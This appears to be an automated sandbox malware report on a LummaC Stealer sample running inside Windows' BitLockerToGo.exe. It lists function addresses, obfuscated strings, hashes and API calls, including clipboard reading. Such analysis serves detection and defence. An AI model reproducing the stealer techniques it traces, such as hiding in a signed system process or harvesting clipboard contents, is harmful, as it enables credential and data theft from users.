Path:	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
Imagebase:	0x7ff6d64d0000
File size:	231'736 bytes
MD5 hash:	A64BEAB5D4516BECA4C40B25DC0C1CD8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000002.00000002.2291496488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	true

Show Windows behavior

Function 00797700 Relevance: 10.2, Strings: 8, Instructions: 189COMMON

Download Yara Rule

Strings

runtime: VirtualQuery failed; errno=runtime: sudog with non-nil waitlinkruntime: mcall called on m->g0 stackstartm: P required for spinning=true) is not Grunnable or Gscanrunnableruntime: bad notifyList size - sync=accessed data from freed user arena runtime:, xrefs: 0079796E
runtime: CreateWaitableTimerEx failed; errno=exitsyscall: syscall frame is no longer validunsafe.String: ptr is nil and len is not zeroreflect: nil type passed to Type.AssignableToreflect: internal error: invalid method indexx509: IP constraint contained inval, xrefs: 007979C9
bad g0 stackself-preempt [recovered]bad recoverybad g statusentersyscallwirep: p->m=) p->status=releasep: m= sysmonwait= preemptoff=cas64 failed m->gsignal=-byte limitruntime: sp=abi mismatch%!(BADWIDTH)152587890625762939453125reflect.CopyECDSA-SHA256ECDSA-SH, xrefs: 00797947
%, xrefs: 00797A61
CreateWaitableTimerEx when creating timer failedruntime.preemptM: duplicatehandle failed; errno=runtime: waitforsingleobject wait_failed; errno=strconv: illegal AppendFloat/FormatFloat bitSizenot enough significant bits after mult64bitPow10reflect: CallSlice w, xrefs: 007979FD
VirtualQuery for stack base failedforEachP: sched.safePointWait != 0schedule: spinning with local workruntime: g is running but p is notdoaddtimer: P already set in timer3552713678800500929355621337890625reflect: Field of non-struct type reflect: Field index o, xrefs: 007979A2
runtime.minit: duplicatehandle failed_cgo_notify_runtime_init_done missingstartTheWorld: inconsistent mp->nextpruntime: unexpected SPWRITE function all goroutines are asleep - deadlock!2220446049250313080847263336181640625reflect: Bits of non-arithmetic Type r, xrefs: 00797A58
runtime.minit: duplicatehandle failed; errno=runtime: CreateWaitableTimerEx failed; errno=exitsyscall: syscall frame is no longer validunsafe.String: ptr is nil and len is not zeroreflect: nil type passed to Type.AssignableToreflect: internal error: invalid me, xrefs: 00797A24

Memory Dump Source

Source File: 00000000.00000002.2253099183.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2253016238.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254061045.0000000000AB1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254061045.0000000000FEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254061045.0000000001007000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254061045.0000000001010000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254061045.0000000001018000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254061045.000000000101B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254061045.000000000101E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254061045.0000000001021000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254061045.0000000001023000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254061045.0000000001026000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254061045.000000000102B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254061045.000000000104B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254061045.0000000001053000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254624635.0000000001217000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254638137.0000000001218000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254678567.000000000121D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254692024.000000000121E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254707320.000000000121F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254733611.0000000001249000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254762944.0000000001252000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254796415.0000000001253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254809490.0000000001257000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254843415.000000000126B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254843415.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254843415.00000000012AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254897507.00000000012B4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254912949.00000000012B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254912949.00000000012E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_webNY0O9Sr.jbxd

Similarity

API ID:
String ID: %$CreateWaitableTimerEx when creating timer failedruntime.preemptM: duplicatehandle failed; errno=runtime: waitforsingleobject wait_failed; errno=strconv: illegal AppendFloat/FormatFloat bitSizenot enough significant bits after mult64bitPow10reflect: CallSlice w$VirtualQuery for stack base failedforEachP: sched.safePointWait != 0schedule: spinning with local workruntime: g is running but p is notdoaddtimer: P already set in timer3552713678800500929355621337890625reflect: Field of non-struct type reflect: Field index o$bad g0 stackself-preempt [recovered]bad recoverybad g statusentersyscallwirep: p->m=) p->status=releasep: m= sysmonwait= preemptoff=cas64 failed m->gsignal=-byte limitruntime: sp=abi mismatch%!(BADWIDTH)152587890625762939453125reflect.CopyECDSA-SHA256ECDSA-SH$runtime.minit: duplicatehandle failed; errno=runtime: CreateWaitableTimerEx failed; errno=exitsyscall: syscall frame is no longer validunsafe.String: ptr is nil and len is not zeroreflect: nil type passed to Type.AssignableToreflect: internal error: invalid me$runtime.minit: duplicatehandle failed_cgo_notify_runtime_init_done missingstartTheWorld: inconsistent mp->nextpruntime: unexpected SPWRITE function all goroutines are asleep - deadlock!2220446049250313080847263336181640625reflect: Bits of non-arithmetic Type r$runtime: CreateWaitableTimerEx failed; errno=exitsyscall: syscall frame is no longer validunsafe.String: ptr is nil and len is not zeroreflect: nil type passed to Type.AssignableToreflect: internal error: invalid method indexx509: IP constraint contained inval$runtime: VirtualQuery failed; errno=runtime: sudog with non-nil waitlinkruntime: mcall called on m->g0 stackstartm: P required for spinning=true) is not Grunnable or Gscanrunnableruntime: bad notifyList size - sync=accessed data from freed user arena runtime:
API String ID: 0-56490595
Opcode ID: 949bdeb3b689cc9cb2f594da3af61e981654522146338e785a579cf3fd1af2ef
Instruction ID: ca1c78d54d81425c65451b08526852d68190ca46b1b2fed6eea3e5ac7c38efa9
Opcode Fuzzy Hash: 949bdeb3b689cc9cb2f594da3af61e981654522146338e785a579cf3fd1af2ef
Instruction Fuzzy Hash: 9291D0B4518741CFCB15EF68E199B1ABBF0BF88704F40896CE4988B351DB799944CB92

Analysis Process: BitLockerToGo.exePID: 6572, Parent PID: 6332COMMON

Execution Graph

Execution Coverage:	1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	12%
Total number of Nodes:	50
Total number of Limit Nodes:	7

Executed Functions

Function 0040F930 Relevance: 16.6, Strings: 13, Instructions: 393
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

%W'U, xrefs: 0040FA72
o/^-, xrefs: 0040FA02
\+^), xrefs: 0040FA0A
_'[%, xrefs: 0040FA12
'[(Y, xrefs: 0040FA6A
l, xrefs: 0040F94E
;6, xrefs: 0040FB68
W?O=, xrefs: 0040FA22
6K;I, xrefs: 0040FA4A
(S)Q, xrefs: 0040FA7A
~, xrefs: 0040FD35
zkji, xrefs: 0040FA8A
,o}m, xrefs: 0040FA82

Memory Dump Source

Source File: 00000002.00000002.2291496488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: %W'U$'[(Y$(S)Q$,o}m$6K;I$;6$W?O=$\+^)$_'[%$l$o/^-$zkji$~
API String ID: 0-1830351649
Opcode ID: 53010f497cdc5826961b6af2d0b4e04b2cfd75837e1878e8d2a5d9860c39967a
Instruction ID: 48848384f33eff43ee34f9177679431ceeba44ccc88bb20bd5fbdc8c593559c7
Opcode Fuzzy Hash: 53010f497cdc5826961b6af2d0b4e04b2cfd75837e1878e8d2a5d9860c39967a
Instruction Fuzzy Hash: 56D16B7050C3808BD321DF18D094A6FBBE1AF92744F18093EE4D59B7A2D379D949CB9A

Function 00410561 Relevance: 7.8, Strings: 6, Instructions: 296
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

]/Z-, xrefs: 004105BF
UK, xrefs: 00410670
Mt, xrefs: 00410677
Mq, xrefs: 0041067E
iG, xrefs: 00410685
Mt, xrefs: 00410747, 00410724, 00410757

Memory Dump Source

Source File: 00000002.00000002.2291496488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: Mq$Mt$Mt$UK$]/Z-$iG
API String ID: 0-4007004478
Opcode ID: 6fdc9a92f820dc4f1656de64a3a717cca712ba11fc4b60b36044f5bf918802f2
Instruction ID: c0a25b17645d4546ef0033a017c2120a6071a9021f4fe019fabc7824eec98120
Opcode Fuzzy Hash: 6fdc9a92f820dc4f1656de64a3a717cca712ba11fc4b60b36044f5bf918802f2
Instruction Fuzzy Hash: 9A91AD75904216DBDB018F64DC91BAFBBB5FF4A302F144468E811AB3A1D778E851CFA8

Function 00448250 Relevance: 1.5, APIs: 1, Instructions: 14
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(0044B977,005C003F,00000006,?,?,00000018,C0C7C6C5,?,?), ref: 0044827E

Memory Dump Source

Source File: 00000002.00000002.2291496488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
Instruction ID: fb6f357373f259be8b0e83fffc5d2a3912a28e0da7d2036ce94b71e982b3a7e9
Opcode Fuzzy Hash: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
Instruction Fuzzy Hash: 76E0FE75908316AB9A09CF45C14444EFBE5BFC4714F11CC8DA4D867210D3B0AD46DF82

Function 0040CFD0 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 182
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetInputState.USER32 ref: 0040CFE1
GetCurrentThreadId.KERNEL32 ref: 0040CFF6
GetCurrentProcessId.KERNEL32 ref: 0040CFFC
ExitProcess.KERNEL32 ref: 0040D1D0

Strings

c{zy, xrefs: 0040D0F3, 0040D0FB
3016, xrefs: 0040D16E

Memory Dump Source

Source File: 00000002.00000002.2291496488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID: CurrentProcess$ExitInputStateThread
String ID: 3016$c{zy
API String ID: 1029096631-288423918
Opcode ID: 74122adbea757a30602a3ad247c8573d7916a25209d1ed5432255a2a5d8db78b
Instruction ID: 272c74480c2fe7838131107889406e456e321840fadcbf1be4cda5d41cb61ae9
Opcode Fuzzy Hash: 74122adbea757a30602a3ad247c8573d7916a25209d1ed5432255a2a5d8db78b
Instruction Fuzzy Hash: D6414A7480D3809BD301BBA9D584A1EFBE5EF56705F148C2DE5C49B392C63AC854CB6B

Function 0040E9C0 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 233
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32(631B6117,00000000,C3C2C9C0), ref: 0040EAC7

Strings

fny, xrefs: 0040EBA4, 0040EBB0
='&!, xrefs: 0040EC67, 0040EC73

Memory Dump Source

Source File: 00000002.00000002.2291496488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: ='&!$fny
API String ID: 1029625771-4096011079
Opcode ID: 531640c2bc2d8e1ee3207be67099ddcde65c58f5771817d043a8619a524742d0
Instruction ID: a77118c789fc1a67556c857a9f8e264b675599f5204ab9cca92ca83350d1a7e2
Opcode Fuzzy Hash: 531640c2bc2d8e1ee3207be67099ddcde65c58f5771817d043a8619a524742d0
Instruction Fuzzy Hash: 0C9116B450C3808FD321DF65E845B6FBBE5BB86309F540C2DE49997293D33994188B6B

Function 00447C30 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 103
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlReAllocateHeap.NTDLL(?,00000000), ref: 00447D49

Strings

B}D, xrefs: 00447D37

Memory Dump Source

Source File: 00000002.00000002.2291496488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID: B}D
API String ID: 1279760036-1736376974
Opcode ID: 16507aaa2af702d9626c9612e4c457ee3dc7fd3e26835bea714958abb8d7301d
Instruction ID: 2e441c60c9b1e91a3021fff24b31f5ce75dd781326703618d8196192901f58e1
Opcode Fuzzy Hash: 16507aaa2af702d9626c9612e4c457ee3dc7fd3e26835bea714958abb8d7301d
Instruction Fuzzy Hash: D6218D7040C240DBE301AB18E944A1EBBF4EF96706F458C6EE4C597322D339E852CB6B

Function 00444C63 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(?,00000000,?,?,00000000), ref: 00444C6D

Strings

\LD, xrefs: 00444C6F

Memory Dump Source

Source File: 00000002.00000002.2291496488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID: \LD
API String ID: 3298025750-3080358726
Opcode ID: 6b7fd573ee38804950c3e6de11d4f7753d4d15143fd03176694981dd159fba24
Instruction ID: 87fe580f80ce5d8708bfc7d5aff80cd93bc30009e595974c868f810b18db950e
Opcode Fuzzy Hash: 6b7fd573ee38804950c3e6de11d4f7753d4d15143fd03176694981dd159fba24
Instruction Fuzzy Hash: 0FB00230145215B9E57117215DD5F7F1D7CDF43E95F510154B244150D146549402D57D

Function 004467CC Relevance: 1.6, APIs: 1, Instructions: 50
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32(?,00000000,00000800), ref: 0044684C

Memory Dump Source

Source File: 00000002.00000002.2291496488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: ab09f3532aaf9385a60081dcb8f36cf73f89713fd9c6bcf85cb570cdea5127c7
Instruction ID: e423871963549528dc254aa935b5501aa6a55a91e7a2dd28250502e3d82dad6f
Opcode Fuzzy Hash: ab09f3532aaf9385a60081dcb8f36cf73f89713fd9c6bcf85cb570cdea5127c7
Instruction Fuzzy Hash: FA118BB59013408FDB20CF58DA447AFBBF1AB06305F64081CD082B7392C735AA45CBAA

Function 00444B70 Relevance: 1.5, APIs: 1, Instructions: 40
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(?,00000000,?), ref: 00444BD3

Memory Dump Source

Source File: 00000002.00000002.2291496488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 65daa67c4eaf022d1d47a053285b30d24db37fe8bf262e13a87d7acf509f2d97
Instruction ID: 972fee4fa35e765e8f970fad489cf574301b1e3f7b6ba2041d58fddf4a1339f9
Opcode Fuzzy Hash: 65daa67c4eaf022d1d47a053285b30d24db37fe8bf262e13a87d7acf509f2d97
Instruction Fuzzy Hash: 37F01D345082409BD301EF58E954B0EBBF4EF95700F05881DE4C497361D635EC64CBAB

Non-executed Functions

Function 00435000 Relevance: 57.6, Strings: 46, Instructions: 141COMMON

Download Yara Rule

Strings

vcC, xrefs: 00435171
K, xrefs: 00435145
e, xrefs: 004352F2
B, xrefs: 004353FA
s, xrefs: 004353CE
V, xrefs: 0043520B
hC, xrefs: 004352FD
ToC, xrefs: 00435376
R, xrefs: 004351B3
RpC, xrefs: 00435012
X, xrefs: 0043543C
M, xrefs: 00435166
m, xrefs: 004354AA
HhC, xrefs: 00435329
J\C, xrefs: 00435150
l, xrefs: 00435360
,WC, xrefs: 00435284
T, xrefs: 004351DF
F, xrefs: 00435410
d, xrefs: 004352DC
[, xrefs: 00435263
Z, xrefs: 0043524D
%hC, xrefs: 00435397
h, xrefs: 0043531E
p, xrefs: 004354C0
S, xrefs: 004351C9
-C, xrefs: 0043500F
_, xrefs: 0043529A
U, xrefs: 004351F5
o, xrefs: 0043538C
MZC, xrefs: 004350D7
oC, xrefs: 004350ED
N, xrefs: 00435426
[,C, xrefs: 0043513A, 0043515B, 00435187, 004351A8, 004351BE, 004351D4, 004351EA, 00435200, 00435216, 00435242, 00435258, 0043528F, 004352D1, 004352E7, 00435313, 0043533F, 00435355, 00435381, 004353AD, 004353C3, 004353D9, 004353EF, 00435405, 0043541B, 00435431, 00435447, 0043545D, 00435473, 00435489, 0043549F, 004354B5
ToC, xrefs: 0043536B
vcC, xrefs: 0043517C
k, xrefs: 0043534A
`, xrefs: 00435468
t, xrefs: 004353E4
i, xrefs: 00435494
f, xrefs: 0043547E
HhC, xrefs: 00435334
P, xrefs: 00435192
\, xrefs: 00435452
W, xrefs: 00435221
r, xrefs: 004353B8

Memory Dump Source

Source File: 00000002.00000002.2291496488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: oC$%hC$,WC$B$F$HhC$HhC$J\C$K$M$MZC$N$P$R$RpC$S$T$ToC$ToC$U$V$W$X$Z$[$[,C$\$_$`$d$e$f$h$i$k$l$m$o$p$r$s$t$vcC$vcC$-C$hC
API String ID: 0-3574190683
Opcode ID: 31375214d44e2e41ac15dd1270c9cc4941d8490c5da7a0218105e0cdbd5aad39
Instruction ID: 2ff2c9688431c16f7b6a5e271a728d51b74b64c541e227f23b3c6fb24e440d62
Opcode Fuzzy Hash: 31375214d44e2e41ac15dd1270c9cc4941d8490c5da7a0218105e0cdbd5aad39
Instruction Fuzzy Hash: BFA15FB045DB818BD3718F11D59C79BBBE4ABC530AF90890ED89D1B292C7B9154CCF8A

Function 004328F0 Relevance: 32.4, APIs: 4, Strings: 13, Instructions: 2635COMMON

Download Yara Rule

Strings

P[WJ, xrefs: 00434975
J-gg, xrefs: 0043315C
0Bme, xrefs: 00432AEF
=:;8, xrefs: 00434622
.L6{, xrefs: 0043313E
07b], xrefs: 00433252
6C, xrefs: 00433ABF
z\B3, xrefs: 00432910
cov_, xrefs: 00432AE5
wh}\, xrefs: 00432AD1
::, xrefs: 00433248
~ruy, xrefs: 00432AB3
WU_N, xrefs: 00433C21

Memory Dump Source

Source File: 00000002.00000002.2291496488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: .L6{$07b]$0Bme$::$=:;8$J-gg$P[WJ$WU_N$cov_$wh}\$z\B3$~ruy$6C
API String ID: 0-2336032333
Opcode ID: c30a4c1b4197b444a7349e00195fc6afc8b4523f8c3b083f892c466e2dc0dbe4
Instruction ID: 9de9e96e24e1c5a7d5850b0923cee3fd567f6ec9a42c6d2fe9029266e9848976
Opcode Fuzzy Hash: c30a4c1b4197b444a7349e00195fc6afc8b4523f8c3b083f892c466e2dc0dbe4
Instruction Fuzzy Hash: D9239C70404B818AD7318F35C5907E3BBE1AF1B305F58989ED4EB8B282DB39B505CB69

Function 004392B0 Relevance: 29.9, APIs: 6, Strings: 11, Instructions: 104clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 004392C0
GetWindowLongW.USER32 ref: 004392E5
GetClipboardData.USER32 ref: 004392F5
GlobalLock.KERNEL32 ref: 00439316
GlobalUnlock.KERNEL32 ref: 00439406
CloseClipboard.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0043940F

Strings

x, xrefs: 00439386
_, xrefs: 00439368
^, xrefs: 0043935E
F, xrefs: 0043937C
M, xrefs: 0043936D
C, xrefs: 00439381
E, xrefs: 0043934F
J, xrefs: 00439363
C, xrefs: 00439359
[, xrefs: 00439354
T, xrefs: 00439372

Memory Dump Source

Source File: 00000002.00000002.2291496488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
String ID: C$C$E$F$J$M$T$[$^$_$x
API String ID: 2832541153-1009912999
Opcode ID: 45f3c4c65dc636020202cd3850b93467bcdac87b35d17739a4c6fa997f81baea
Instruction ID: bff2cbfccf340bfb2147c7e8714ece156081ef0beab16769468d074fb8db06c7
Opcode Fuzzy Hash: 45f3c4c65dc636020202cd3850b93467bcdac87b35d17739a4c6fa997f81baea
Instruction Fuzzy Hash: 314140B150C3818ED301AF78D44836FBFE0AB99315F14492EE4D986282D6BDC949DB5B

Function 004132B9 Relevance: 23.4, APIs: 2, Strings: 13, Instructions: 889COMMON

Download Yara Rule

Strings

4`[b, xrefs: 00412E65
rIjK, xrefs: 0041380D
Q&S, xrefs: 0041381B
8A, xrefs: 0041355B
8EsG, xrefs: 004137F8
5]=_, xrefs: 00413822
9Y&[, xrefs: 00413829
U9L;, xrefs: 004137F1
J=B?, xrefs: 004137EA
4`[b, xrefs: 00412EEA
<M#O, xrefs: 00413806
5U&W, xrefs: 00413814
@gWe, xrefs: 00412BA0

Memory Dump Source

Source File: 00000002.00000002.2291496488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: Q&S$4`[b$4`[b$5U&W$5]=_$8EsG$9Y&[$<M#O$@gWe$J=B?$U9L;$rIjK$8A
API String ID: 0-2378073189
Opcode ID: b244eb29e868a3a80a81dd6cac7e71ab0e0cd97896ab6d90636650511904cc49
Instruction ID: 9e9b32887b7fa44449b4641c5657da595aa3aba72e7960e7e38253896532f521
Opcode Fuzzy Hash: b244eb29e868a3a80a81dd6cac7e71ab0e0cd97896ab6d90636650511904cc49
Instruction Fuzzy Hash: FB62CFB01003418FD7258F25D891B26BBF1FF5A309F24485ED4828B793D77AE896CB99

Function 00428DC0 Relevance: 21.5, APIs: 1, Strings: 11, Instructions: 467COMMON

Download Yara Rule

Strings

Y7U1, xrefs: 0042924C
=ChM, xrefs: 00429274
LO, xrefs: 0042927C
Q#U-, xrefs: 00429234
4G6A, xrefs: 0042926C
Y'K!, xrefs: 0042922C
^+A5, xrefs: 00429244
L3Y=, xrefs: 00429254
E;YE, xrefs: 00429264
M?H9, xrefs: 0042925C
[/Q), xrefs: 0042923C

Memory Dump Source

Source File: 00000002.00000002.2291496488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: 4G6A$=ChM$E;YE$L3Y=$LO$M?H9$Q#U-$Y'K!$Y7U1$[/Q)$^+A5
API String ID: 0-1986983938
Opcode ID: c72d9b82462122766f997344e9f9a463fa515946004848d404c44ddebcb03605
Instruction ID: d979a465a674e9348ad57f0a4343755d13a24b08209cccb3ef03901d53e5c615
Opcode Fuzzy Hash: c72d9b82462122766f997344e9f9a463fa515946004848d404c44ddebcb03605
Instruction Fuzzy Hash: 630252B45093409BD310DF55EA80A2FBBF4EB86B49F80491DF4C59B252E738D905CBAB

Function 0041DFA6 Relevance: 15.0, Strings: 11, Instructions: 1291COMMON

Download Yara Rule

Strings

()./, xrefs: 0041EA6A
8;:5, xrefs: 0041E778
DEz{, xrefs: 0041E983
pqvw, xrefs: 0041E9A4
0v2, xrefs: 0041EAC2
AB, xrefs: 0042093B
, xrefs: 0041E8EB
%q's, xrefs: 0041E117
IJKT47618;:5<?>9, xrefs: 0041EBFE, 0041EC05
9>?, xrefs: 0041EA3E
4761, xrefs: 0041E783

Memory Dump Source

Source File: 00000002.00000002.2291496488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: 9>?$%q's$()./$0v2$4761$8;:5$AB$DEz{$IJKT47618;:5<?>9$pqvw$
API String ID: 0-3420884638
Opcode ID: b5fd21a35d12da9b6c7c75e921f8cc015670a8ae35e6fd091ed89853392d72ba
Instruction ID: 627103cbebfc1d04b74ab5411851cfb4207178a427c414977946d2562bd36195
Opcode Fuzzy Hash: b5fd21a35d12da9b6c7c75e921f8cc015670a8ae35e6fd091ed89853392d72ba
Instruction Fuzzy Hash: 48B27AB56083809BD730CF15C881BEFB7E1ABC5304F54492EE9C99B381DB7A9885CB56

Function 00440B9A Relevance: 14.3, APIs: 2, Strings: 6, Instructions: 328memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(2a=c), ref: 00440C10
SysFreeString.OLEAUT32(00000000), ref: 004411BE

Strings

4`[b, xrefs: 00441400
tu, xrefs: 00440BC2
2a=c, xrefs: 00440BE4, 00440BED
;e2g, xrefs: 00440BA2
=:;8, xrefs: 00441396
&q@s, xrefs: 00440BBA

Memory Dump Source

Source File: 00000002.00000002.2291496488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID: String$AllocFree
String ID: &q@s$2a=c$4`[b$;e2g$=:;8$tu
API String ID: 344208780-4027899571
Opcode ID: 5091e0aa03f1107ad8cbe08a47353b0836b3b9db5202a19f6da080f781c8eef6
Instruction ID: 5292031e3fa935bc8fb83e8b135d9f581d0aa7dd9c3d19a3780fe636bb165658
Opcode Fuzzy Hash: 5091e0aa03f1107ad8cbe08a47353b0836b3b9db5202a19f6da080f781c8eef6
Instruction Fuzzy Hash: 9CA10F75A08341DFEB00CF64EC91B6EB7B1FB89306F28082DE45597292D738E910CB59

Function 00429FCD Relevance: 14.2, Strings: 11, Instructions: 419COMMON

Download Yara Rule

Strings

wq, xrefs: 0042AA63
w9}7, xrefs: 0042AADC
?Z=, xrefs: 0042A6F1
|-f+, xrefs: 0042AAFD
xy, xrefs: 0042AB8C
_g, xrefs: 0042AA4D
{CxA, xrefs: 0042A484
HO, xrefs: 0042A4A5
y)i', xrefs: 0042AB08
dr, xrefs: 0042AA58
u%s#, xrefs: 0042AB13

Memory Dump Source

Source File: 00000002.00000002.2291496488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: ?Z=$HO$_g$dr$u%s#$w9}7$wq$xy$y)i'${CxA$|-f+
API String ID: 0-3413675835
Opcode ID: df41d6de78c981e39bdff221ac6eabcd88139be308bf1d7d6fec53855141a323
